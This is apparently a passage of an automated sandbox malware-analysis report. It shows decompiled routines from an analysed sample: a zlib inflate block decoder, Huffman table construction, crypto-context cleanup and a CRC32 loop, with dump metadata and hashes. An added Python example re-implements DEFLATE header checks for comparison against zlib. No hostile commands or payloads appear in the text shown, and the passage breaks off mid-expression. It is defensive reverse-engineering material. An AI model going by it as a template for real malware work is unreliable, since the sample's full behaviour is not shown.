            							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
            							 *_t488 = 6;
            							goto L98;
            						}
            						_t455 = _t442 - 1;
            						__eflags = _t455;
            						if(_t455 == 0) {
            							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
            							_t456 = 3;
            							_t33 = _t490 + 0xc;
            							 *_t33 =  *(_t490 + 0xc) - _t456;
            							__eflags =  *_t33;
            							goto L16;
            						}
            						__eflags = _t455 == 1;
            						if(_t455 == 1) {
            							 *_t488 = 9;
            							 *(_t485 + 0x18) = "invalid block type";
            							_t488[8] =  *(_t490 + 8) >> 3;
            							_t461 =  *(_t490 + 0xc) + 0xfffffffd;
            							L105:
            							_t488[7] = _t461;
            							 *(_t485 + 4) =  *(_t490 - 4);
            							 *_t485 = _t476;
            							_push(0xfffffffd);
            							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
            							_t488[0xd] =  *(_t490 - 8);
            							goto L100;
            						}
            						goto L98;
            					}
            					L104:
            					__eax =  *(__ebp + 8);
            					 *(__esi + 0x20) =  *(__ebp + 8);
            					__eax =  *(__ebp + 0xc);
            					goto L105;
            					L122:
            					__eax =  *(__ebp + 8);
            					_push(1);
            					 *(__esi + 0x20) =  *(__ebp + 8);
            					__eax =  *(__ebp + 0xc);
            					 *(__esi + 0x1c) =  *(__ebp + 0xc);
            					__eax =  *(__ebp - 4);
            					__edi[1] =  *(__ebp - 4);
            					__ebx = __ebx -  *__edi;
            					 *__edi = __ebx;
            					__edi[2] = __edi[2] + __ebx -  *__edi;
            					__eax =  *(__ebp - 8);
            					 *(__esi + 0x34) =  *(__ebp - 8);
            					goto L100;
            					L118:
            					__eax =  *(__ebp - 8);
            					 *(__esi + 0x34) =  *(__ebp - 8);
            					__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
            					__ecx =  *(__esi + 0x34);
            					__eflags =  *(__esi + 0x30) - __ecx;
            					 *(__ebp - 8) = __ecx;
            					if( *(__esi + 0x30) == __ecx) {
            						 *__esi = 8;
            						goto L122;
            					}
            					__ecx =  *(__ebp + 8);
            					 *(__esi + 0x20) =  *(__ebp + 8);
            					__ecx =  *(__ebp + 0xc);
            					 *(__esi + 0x1c) =  *(__ebp + 0xc);
            					__ecx =  *(__ebp - 4);
            					__edi[1] =  *(__ebp - 4);
            					__ebx = __ebx -  *__edi;
            					 *__edi = __ebx;
            					_t409 =  &(__edi[2]);
            					 *_t409 = __edi[2] + __ebx -  *__edi;
            					__eflags =  *_t409;
            					__ecx =  *(__ebp - 8);
            					 *(__esi + 0x34) = __ecx;
            					goto L120;
            				}
            			}

            Instruction address column (one entry per line of the listing above, 0x00000000 for lines with no mapped instruction): 0x004043b7 to 0x00404bb5.

            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
            • Instruction ID: 90343a8667ee0670e87e021bba3e221c8adc0c1da1bb1a76252bfdf766af77e9
            • Opcode Fuzzy Hash: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
            • Instruction Fuzzy Hash: FB520CB5900609EFCB14CF69C580AAABBF1FF49315F10852EE95AA7780D338EA55CF44
            Uniqueness

            Uniqueness Score: -1.00%
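            The error strings in the listing above ("too many length or distance symbols", "invalid stored block lengths", "invalid block type") are the ones zlib's inflate_blocks (infblock.c) stores in z->msg, so the decompiled state machine is a DEFLATE block decoder. Its checks are hard to follow in register form, so the Python below re-expresses the block-header parsing and the three validity checks in the order the decompiled code performs them (BFINAL/BTYPE, stored LEN versus NLEN complement, dynamic HLIT/HDIST bounds) and cross-checks every case against the reference zlib in Python's standard library. This is an added example written for this page, not code from the sample or from the Joe Sandbox report; the byte strings are constructed test inputs, and Huffman payloads are not decoded (the walker stops at the first fixed or dynamic block).

```python
"""DEFLATE block-header walker mirroring the checks in zlib's inflate_blocks."""
import zlib


class InflateError(Exception):
    """Raised with the same message strings the decompiled code stores in z->msg."""


class BitReader:
    """LSB-first bit buffer, the b (bits) / k (bit count) pair of inflate_blocks."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0
        self.bitbuf, self.bitcnt = 0, 0

    def need(self, n: int) -> None:
        # NEEDBITS(n): pull whole bytes until at least n bits are buffered.
        while self.bitcnt < n:
            if self.pos >= len(self.data):
                raise InflateError("unexpected end of input")
            self.bitbuf |= self.data[self.pos] << self.bitcnt
            self.pos += 1
            self.bitcnt += 8

    def bits(self, n: int) -> int:
        # Read n bits (LSB first), then DUMPBITS(n).
        self.need(n)
        value = self.bitbuf & ((1 << n) - 1)
        self.bitbuf >>= n
        self.bitcnt -= n
        return value

    def align(self) -> None:
        # Stored blocks start on a byte boundary: drop the k & 7 leftover bits.
        self.bits(self.bitcnt & 7)

    def take_bytes(self, n: int) -> bytes:
        # Copy n raw bytes, draining whole bytes still held in the bit buffer first.
        out = bytearray()
        while n and self.bitcnt >= 8:
            out.append(self.bitbuf & 0xFF)
            self.bitbuf >>= 8
            self.bitcnt -= 8
            n -= 1
        if self.pos + n > len(self.data):
            raise InflateError("unexpected end of input")
        out += self.data[self.pos:self.pos + n]
        self.pos += n
        return bytes(out)


def walk_blocks(data: bytes) -> list:
    """Parse raw DEFLATE block headers with the validity checks of inflate_blocks.

    Stored blocks are copied out and the walk continues with the next block.
    Fixed/dynamic Huffman blocks get their header validated and end the walk,
    since decoding their payload is beyond this example.
    """
    r = BitReader(data)
    blocks = []
    while True:
        final = r.bits(1)          # BFINAL
        btype = r.bits(2)          # BTYPE: 0 stored, 1 fixed, 2 dynamic, 3 reserved
        if btype == 0:
            r.align()
            length = r.bits(16)    # LEN
            nlength = r.bits(16)   # NLEN, must be the one's complement of LEN
            if length != (~nlength & 0xFFFF):
                raise InflateError("invalid stored block lengths")
            blocks.append(("stored", final, r.take_bytes(length)))
            if final:
                return blocks
        elif btype == 1:
            blocks.append(("fixed", final))
            return blocks
        elif btype == 2:
            t = r.bits(14)         # HLIT(5) | HDIST(5) << 5 | HCLEN(4) << 10
            hlit, hdist, hclen = t & 0x1F, (t >> 5) & 0x1F, (t >> 10) & 0xF
            # The decompiled code tests (t & 0x1f) > 0x1d and (t & 0x3e0) > 0x3a0:
            # at most 286 literal/length codes and 30 distance codes.
            if hlit > 29 or hdist > 29:
                raise InflateError("too many length or distance symbols")
            blocks.append(("dynamic", final, 257 + hlit, 1 + hdist, 4 + hclen))
            return blocks
        else:
            raise InflateError("invalid block type")


def classify(data: bytes) -> str:
    """Return "ok" or the inflate_blocks error message for a raw DEFLATE stream."""
    try:
        walk_blocks(data)
        return "ok"
    except InflateError as exc:
        return str(exc)


def reference_inflate(data: bytes) -> bytes:
    """Reference decode with the real zlib (raw DEFLATE, wbits=-15)."""
    return zlib.decompress(data, -15)


def zlib_rejects(data: bytes) -> bool:
    """Cross-check: does the reference zlib reject the stream?"""
    try:
        reference_inflate(data)
        return False
    except zlib.error:
        return True


def _stored(final: int, payload: bytes) -> bytes:
    # Header byte carries BFINAL in bit 0 and BTYPE=0 in bits 1-2, then LEN/NLEN LE.
    n = len(payload)
    return bytes([final]) + n.to_bytes(2, "little") + (~n & 0xFFFF).to_bytes(2, "little") + payload


# Constructed test inputs (not taken from the sample).
STORED_STREAM = _stored(0, b"hello ") + _stored(1, b"world")
BAD_NLEN = b"\x01\x05\x00\x00\x00world"   # LEN=5 but NLEN=0
BAD_TYPE = b"\x07"                         # BFINAL=1, BTYPE=3
BAD_HLIT = b"\xf5\x00\x00"                 # BFINAL=1, BTYPE=2, HLIT=30 (> 29)
_c = zlib.compressobj(9, zlib.DEFLATED, -15)
REAL_STREAM = _c.compress(bytes(range(256)) * 4) + _c.flush()

if __name__ == "__main__":
    for name, blob in [("stored", STORED_STREAM), ("bad nlen", BAD_NLEN), ("bad type", BAD_TYPE),
                       ("bad hlit", BAD_HLIT), ("zlib output", REAL_STREAM)]:
        print(f"{name:12s} walker: {classify(blob):40s} zlib rejects: {zlib_rejects(blob)}")
```

            The walker and the reference zlib agree on all five inputs, which is the quick way to confirm that a decompiled routine really is an unmodified inflate rather than a customised unpacker: feed it the same malformed headers and compare the verdicts.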

            C-Code - Quality: 16%
            			E004018B9(void* __ecx) {
            				signed int _t10;
            				signed int _t11;
            				long* _t12;
            				void* _t13;
            				void* _t18;
            
            				_t18 = __ecx;
            				_t10 =  *(__ecx + 8);
            				if(_t10 != 0) {
            					 *0x40f89c(_t10);
            					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
            				}
            				_t11 =  *(_t18 + 0xc);
            				if(_t11 != 0) {
            					 *0x40f89c(_t11);
            					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
            				}
            				_t12 =  *(_t18 + 4);
            				if(_t12 != 0) {
            					CryptReleaseContext(_t12, 0);
            					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
            				}
            				_t13 = 1;
            				return _t13;
            			}

            Instruction address column (one entry per line of the listing above): 0x004018ba to 0x004018f8.

            APIs
            • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ContextCryptRelease
            • String ID:
            • API String ID: 829835001-0
            • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
            • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
            • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
            • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E00404C19(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32, signed int* _a36, signed char* _a40) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed char* _v20;
            				intOrPtr _v24;
            				signed int _v28;
            				signed int _v32;
            				intOrPtr* _v36;
            				void* _v40;
            				char _v43;
            				signed char _v44;
            				signed int _v48;
            				intOrPtr _v52;
            				intOrPtr _v56;
            				char _v60;
            				signed int _v64;
            				signed int _v68;
            				signed int _v72;
            				signed int _v76;
            				signed int _v80;
            				signed int _v84;
            				signed int _v88;
            				signed int _v92;
            				signed int _v96;
            				signed int _v100;
            				signed int _v104;
            				signed int _v108;
            				signed int _v112;
            				char _v116;
            				signed int _v120;
            				signed int _v180;
            				signed int _v184;
            				signed int _v244;
            				signed int _t190;
            				intOrPtr* _t192;
            				signed int _t193;
            				void* _t194;
            				void* _t195;
            				signed int _t196;
            				signed int _t199;
            				intOrPtr _t203;
            				intOrPtr _t207;
            				signed char* _t211;
            				signed char _t212;
            				signed int _t214;
            				signed int _t216;
            				signed int _t217;
            				signed int _t218;
            				intOrPtr* _t220;
            				signed int _t224;
            				signed int _t225;
            				signed int _t226;
            				signed int _t228;
            				intOrPtr _t229;
            				signed int _t231;
            				char _t233;
            				signed int _t235;
            				signed int _t236;
            				signed int _t237;
            				signed int _t241;
            				signed int _t242;
            				intOrPtr _t243;
            				signed int* _t244;
            				signed int _t246;
            				signed int _t247;
            				signed int* _t248;
            				signed int _t249;
            				intOrPtr* _t250;
            				intOrPtr _t251;
            				signed int _t252;
            				signed char _t257;
            				signed int _t266;
            				signed int _t269;
            				signed char _t271;
            				intOrPtr _t275;
            				signed char* _t277;
            				signed int _t280;
            				signed int _t282;
            				signed int _t283;
            				signed int _t284;
            				intOrPtr* _t287;
            				intOrPtr _t294;
            				signed int _t296;
            				intOrPtr* _t297;
            				intOrPtr _t298;
            				intOrPtr _t300;
            				signed char _t302;
            				void* _t306;
            				signed int _t307;
            				signed int _t308;
            				intOrPtr* _t309;
            				signed int _t312;
            				signed int _t313;
            				signed int _t314;
            				signed int _t315;
            				signed int _t319;
            				intOrPtr _t320;
            				unsigned int _t321;
            				intOrPtr* _t322;
            				void* _t323;
            
            				_t248 = _a4;
            				_t296 = _a8;
            				_t280 = 0;
            				_v120 = 0;
            				_v116 = 0;
            				_v112 = 0;
            				_v108 = 0;
            				_v104 = 0;
            				_v100 = 0;
            				_v96 = 0;
            				_v92 = 0;
            				_v88 = 0;
            				_v84 = 0;
            				_v80 = 0;
            				_v76 = 0;
            				_v72 = 0;
            				_v68 = 0;
            				_v64 = 0;
            				_v60 = 0;
            				_t307 = _t296;
            				do {
            					_t190 =  *_t248;
            					_t248 =  &(_t248[1]);
            					 *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) =  *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) + 1;
            					_t307 = _t307 - 1;
            				} while (_t307 != 0);
            				if(_v120 != _t296) {
            					_t297 = _a28;
            					_t241 = 1;
            					_t192 =  &_v116;
            					_t308 =  *_t297;
            					_t249 = _t241;
            					_a28 = _t308;
            					while( *_t192 == _t280) {
            						_t249 = _t249 + 1;
            						_t192 = _t192 + 4;
            						if(_t249 <= 0xf) {
            							continue;
            						}
            						break;
            					}
            					_v8 = _t249;
            					if(_t308 < _t249) {
            						_a28 = _t249;
            					}
            					_t309 =  &_v60;
            					_t193 = 0xf;
            					while( *_t309 == _t280) {
            						_t193 = _t193 - 1;
            						_t309 = _t309 - 4;
            						if(_t193 != _t280) {
            							continue;
            						}
            						break;
            					}
            					_v28 = _t193;
            					if(_a28 > _t193) {
            						_a28 = _t193;
            					}
            					_t242 = _t241 << _t249;
            					 *_t297 = _a28;
            					if(_t249 >= _t193) {
            						L20:
            						_t312 = _t193 << 2;
            						_t298 =  *((intOrPtr*)(_t323 + _t312 - 0x74));
            						_t250 = _t323 + _t312 - 0x74;
            						_t243 = _t242 - _t298;
            						_v52 = _t243;
            						if(_t243 < 0) {
            							goto L39;
            						}
            						_v180 = _t280;
            						 *_t250 = _t298 + _t243;
            						_t251 = 0;
            						_t195 = _t193 - 1;
            						if(_t195 == 0) {
            							L24:
            							_t244 = _a4;
            							_t300 = 0;
            							do {
            								_t196 =  *_t244;
            								_t244 =  &(_t244[1]);
            								if(_t196 != _t280) {
            									_t252 =  *(_t323 + _t196 * 4 - 0xb4);
            									 *((intOrPtr*)(_a40 + _t252 * 4)) = _t300;
            									 *(_t323 + _t196 * 4 - 0xb4) = _t252 + 1;
            									_t280 = 0;
            								}
            								_t300 = _t300 + 1;
            							} while (_t300 < _a8);
            							_v12 = _v12 | 0xffffffff;
            							_a8 =  *((intOrPtr*)(_t323 + _t312 - 0xb4));
            							_v16 = _t280;
            							_v20 = _a40;
            							_t199 = _v8;
            							_t246 =  ~_a28;
            							_v184 = _t280;
            							_v244 = _t280;
            							_v32 = _t280;
            							_a4 = _t280;
            							if(_t199 > _v28) {
            								L64:
            								if(_v52 == _t280 || _v28 == 1) {
            									L4:
            									return 0;
            								} else {
            									_push(0xfffffffb);
            									goto L67;
            								}
            							}
            							_v48 = _t199 - 1;
            							_v36 = _t323 + _t199 * 4 - 0x74;
            							do {
            								_t203 =  *_v36;
            								_v24 = _t203 - 1;
            								if(_t203 == 0) {
            									goto L63;
            								} else {
            									goto L31;
            								}
            								do {
            									L31:
            									_t207 = _a28 + _t246;
            									if(_v8 <= _t207) {
            										L46:
            										_v43 = _v8 - _t246;
            										_t257 = _a40 + _a8 * 4;
            										_t211 = _v20;
            										if(_t211 < _t257) {
            											_t212 =  *_t211;
            											if(_t212 >= _a12) {
            												_t214 = _t212 - _a12 << 2;
            												_v44 =  *((intOrPtr*)(_t214 + _a20)) + 0x50;
            												_t302 =  *(_t214 + _a16);
            											} else {
            												_t302 = _t212;
            												asm("sbb cl, cl");
            												_v44 = (_t257 & 0x000000a0) + 0x60;
            											}
            											_v20 =  &(_v20[4]);
            											L52:
            											_t313 = 1;
            											_t314 = _t313 << _v8 - _t246;
            											_t216 = _v16 >> _t246;
            											if(_t216 >= _a4) {
            												L56:
            												_t217 = 1;
            												_t218 = _t217 << _v48;
            												_t266 = _v16;
            												while((_t266 & _t218) != 0) {
            													_t266 = _t266 ^ _t218;
            													_t218 = _t218 >> 1;
            												}
            												_v16 = _t266 ^ _t218;
            												_t220 = _t323 + _v12 * 4 - 0xb4;
            												while(1) {
            													_t315 = 1;
            													if(((_t315 << _t246) - 0x00000001 & _v16) ==  *_t220) {
            														goto L62;
            													}
            													_v12 = _v12 - 1;
            													_t220 = _t220 - 4;
            													_t246 = _t246 - _a28;
            												}
            												goto L62;
            											}
            											_t277 = _v32 + _t216 * 8;
            											do {
            												_t216 = _t216 + _t314;
            												 *_t277 = _v44;
            												_t277[4] = _t302;
            												_t277 = _t277 + (_t314 << 3);
            											} while (_t216 < _a4);
            											_t280 = 0;
            											goto L56;
            										}
            										_v44 = 0xc0;
            										goto L52;
            									} else {
            										goto L32;
            									}
            									do {
            										L32:
            										_t269 = _a28;
            										_v12 = _v12 + 1;
            										_t246 = _t246 + _t269;
            										_v56 = _t207 + _t269;
            										_t224 = _v28 - _t246;
            										_a4 = _t224;
            										if(_t224 > _t269) {
            											_a4 = _t269;
            										}
            										_t271 = _v8 - _t246;
            										_t225 = 1;
            										_t226 = _t225 << _t271;
            										_t282 = _v24 + 1;
            										if(_t226 <= _t282) {
            											L40:
            											_t283 = 1;
            											_t228 =  *_a36;
            											_t284 = _t283 << _t271;
            											_a4 = _t284;
            											_t319 = _t228 + _t284;
            											if(_t319 > 0x5a0) {
            												goto L39;
            											}
            										} else {
            											_t320 = _v36;
            											_t236 = _t226 + (_t282 | 0xffffffff) - _v24;
            											if(_t271 >= _a4) {
            												goto L40;
            											} else {
            												goto L36;
            											}
            											while(1) {
            												L36:
            												_t271 = _t271 + 1;
            												if(_t271 >= _a4) {
            													goto L40;
            												}
            												_t294 =  *((intOrPtr*)(_t320 + 4));
            												_t320 = _t320 + 4;
            												_t237 = _t236 << 1;
            												if(_t237 <= _t294) {
            													goto L40;
            												}
            												_t236 = _t237 - _t294;
            											}
            											goto L40;
            										}
            										_t229 = _a32 + _t228 * 8;
            										_v32 = _t229;
            										_t287 = _t323 + _v12 * 4 - 0xf0;
            										 *_t287 = _t229;
            										 *_a36 = _t319;
            										_t231 = _v12;
            										if(_t231 == 0) {
            											 *_a24 = _v32;
            										} else {
            											_t321 = _v16;
            											 *(_t323 + _t231 * 4 - 0xb4) = _t321;
            											_t233 = _a28;
            											_v44 = _t271;
            											_v43 = _t233;
            											_t235 = _t321 >> _t246 - _t233;
            											_t275 =  *((intOrPtr*)(_t287 - 4));
            											_t302 = (_v32 - _t275 >> 3) - _t235;
            											 *(_t275 + _t235 * 8) = _v44;
            											 *(_t275 + 4 + _t235 * 8) = _t302;
            										}
            										_t207 = _v56;
            									} while (_v8 > _t207);
            									_t280 = 0;
            									goto L46;
            									L62:
            									_v24 = _v24 - 1;
            								} while (_v24 != 0);
            								L63:
            								_v8 = _v8 + 1;
            								_v36 = _v36 + 4;
            								_v48 = _v48 + 1;
            							} while (_v8 <= _v28);
            							goto L64;
            						}
            						_t306 = 0;
            						do {
            							_t251 = _t251 +  *((intOrPtr*)(_t323 + _t306 - 0x70));
            							_t306 = _t306 + 4;
            							_t195 = _t195 - 1;
            							 *((intOrPtr*)(_t323 + _t306 - 0xb0)) = _t251;
            						} while (_t195 != 0);
            						goto L24;
            					} else {
            						_t322 = _t323 + _t249 * 4 - 0x74;
            						while(1) {
            							_t247 = _t242 -  *_t322;
            							if(_t247 < 0) {
            								break;
            							}
            							_t249 = _t249 + 1;
            							_t322 = _t322 + 4;
            							_t242 = _t247 << 1;
            							if(_t249 < _t193) {
            								continue;
            							}
            							goto L20;
            						}
            						L39:
            						_push(0xfffffffd);
            						L67:
            						_pop(_t194);
            						return _t194;
            					}
            				}
            				 *_a24 = 0;
            				 *_a28 = 0;
            				goto L4;
            			}

            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
            • Instruction ID: 9637f4fcf05056c634a246d4ec164b1eccd92df816b65a9601eba7856632ad8a
            • Opcode Fuzzy Hash: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
            • Instruction Fuzzy Hash: 36D1F5B1A002199FDF14CFA9D9805EDBBB1FF88314F25826AD959B7390D734AA41CB84
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040541F(signed int _a4, signed char* _a8, unsigned int _a12) {
            				signed int _t35;
            				signed char* _t73;
            				signed char* _t74;
            				signed char* _t75;
            				signed char* _t76;
            				signed char* _t77;
            				signed char* _t78;
            				signed char* _t79;
            				unsigned int _t85;
            
            				_t73 = _a8;
            				if(_t73 != 0) {
            					_t35 =  !_a4;
            					if(_a12 >= 8) {
            						_t85 = _a12 >> 3;
            						do {
            							_a12 = _a12 - 8;
            							_t74 =  &(_t73[1]);
            							_t75 =  &(_t74[1]);
            							_t76 =  &(_t75[1]);
            							_t77 =  &(_t76[1]);
            							_t78 =  &(_t77[1]);
            							_t79 =  &(_t78[1]);
            							_t35 = ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  
*_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( 
